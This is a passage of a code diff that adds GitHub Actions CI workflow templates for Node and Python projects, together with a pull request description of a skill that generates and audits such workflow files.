+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Set up Node ${{ matrix.node-version }}
+        uses: actions/setup-node@v4
+        with:
+          node-version: ${{ matrix.node-version }}
+          cache: '{PACKAGE_MANAGER}'
+
+      - name: Install dependencies
+        run: {INSTALL_CMD}
+
+      - name: Run tests
+        run: {TEST_CMD}
+
+      - name: Run linter
+        run: {LINT_CMD}

--- a/skills/ci-yaml/references/templates/python-pip.yml
+++ b/skills/ci-yaml/references/templates/python-pip.yml
@@ -1,0 +1,56 @@
+# Python project using pip + requirements.txt (or pip + pyproject without uv/poetry).
+# Substitute {PYTHON_VERSIONS}, {LOCK_FILE} (requirements.txt or requirements-dev.txt),
+# {LINT_CMD}, {TEST_CMD}.
+
+name: CI
+
+on:
+  push:
+    branches: [main]
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+  pull_request:
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+
+permissions:
+  contents: read
+
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  test:
+    name: Test (Python ${{ matrix.python-version }})
+    runs-on: ubuntu-22.04
+    timeout-minutes: 15
+    strategy:
+      fail-fast: false
+      matrix:
+        python-version: {PYTHON_VERSIONS}
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Set up Python ${{ matrix.python-version }}
+        uses: actions/setup-python@v5
+        with:
+          python-version: ${{ matrix.python-version }}
+          cache: 'pip'
+          cache-dependency-path: {LOCK_FILE}
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip install -r {LOCK_FILE}
+
+      - name: Run tests
+        run: {TEST_CMD}
+
+      - name: Run linter
+        run: {LINT_CMD}

--- a/skills/ci-yaml/references/templates/python-uv.yml
+++ b/skills/ci-yaml/references/templates/python-uv.yml
@@ -1,0 +1,55 @@
+# Python project using uv as package manager.
+# Substitute {PYTHON_VERSIONS} (json array, e.g. ["3.10", "3.11", "3.12"]),
+# {LINT_CMD} (e.g. "uv run ruff check ."), and {TEST_CMD} (e.g. "uv run pytest -v").
+
+name: CI
+
+on:
+  push:
+    branches: [main]
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+  pull_request:
+    paths-ignore:
+      - '**.md'
+      - 'docs/**'
+      - 'LICENSE'
+
+permissions:
+  contents: read
+
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
+jobs:
+  test:
+    name: Test (Python ${{ matrix.python-version }})
+    runs-on: ubuntu-22.04
+    timeout-minutes: 15
+    strategy:
+      fail-fast: false
+      matrix:
+        python-version: {PYTHON_VERSIONS}
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Install uv (with cache)
+        uses: astral-sh/setup-uv@v3
+        with:
+          enable-cache: true
+
+      - name: Pin Python version
+        run: echo "${{ matrix.python-version }}" > .python-version
+
+      - name: Install dependencies
+        run: uv sync --all-extras --dev
+
+      - name: Run tests
+        run: {TEST_CMD}
+
+      - name: Run linter
+        run: {LINT_CMD}


### PR DESCRIPTION
Adds a new skill that **generates and audits `.github/workflows/*.yml` files** for Python and Node.js projects.

## Two modes
| Mode | Trigger | Output |
|------|---------|--------|
| **Generate** | "create/scaffold a CI for this project" | A complete `.github/workflows/ci.yml` matched to the detected stack (uv / pip / poetry / npm / pnpm / yarn) |
| **Audit** | "review/audit/improve my CI workflow" | A prioritized findings report with stable rule IDs (`GHA-SEC-01`, `GHA-PERF-03`, …), severity, file:line, why, and concrete fix |

## Design
- **Progressive disclosure**: 200-line `SKILL.md` body for the main flow; 354-line `references/checklist.md` (30+ rules with stable IDs) loaded only when audit mode needs to cite specifics; 3 stack templates and `before/after` examples loaded only on demand.
- **Stable rule IDs** (`GHA-{SEC,PERF,COR,MNT}-NN`) follow CWE/RFC/PEP-style conventions so users can reference rules across PRs and issues.
- **Distinct from runtime debugging skills** (e.g., [steeef/claude-skill-github-actions](https://github.com/steeef/claude-skill-github-actions)): that one reads `gh run` logs to debug failed runs; this one operates on the YAML source.
- **`skills-ref validate` clean**.
## Self-test
Audited the YAML at `r0bin2u/dns-mcp/.github/workflows/ci.yml` (a public Python+uv MCP server I maintain) and surfaced 8 actionable findings across all four severity tiers: 1 Critical (missing `permissions:`), 2 High (missing `concurrency:` and `timeout-minutes:`), 4 Medium (`ubuntu-latest`, no `paths-ignore`, implicit `fail-fast: true`, no Dependabot for Actions), 1 Low (anonymous steps).
## Standalone repo for issue tracking
https://github.com/r0bin2u/ci-yaml
## Out of scope (v0.1.0)
GitLab CI / Circle CI YAML; composite actions / reusable workflow authoring; self-hosted runners. Audit mode still works on any GitHub Actions YAML — only Generate mode is currently scoped to Python and Node.js.
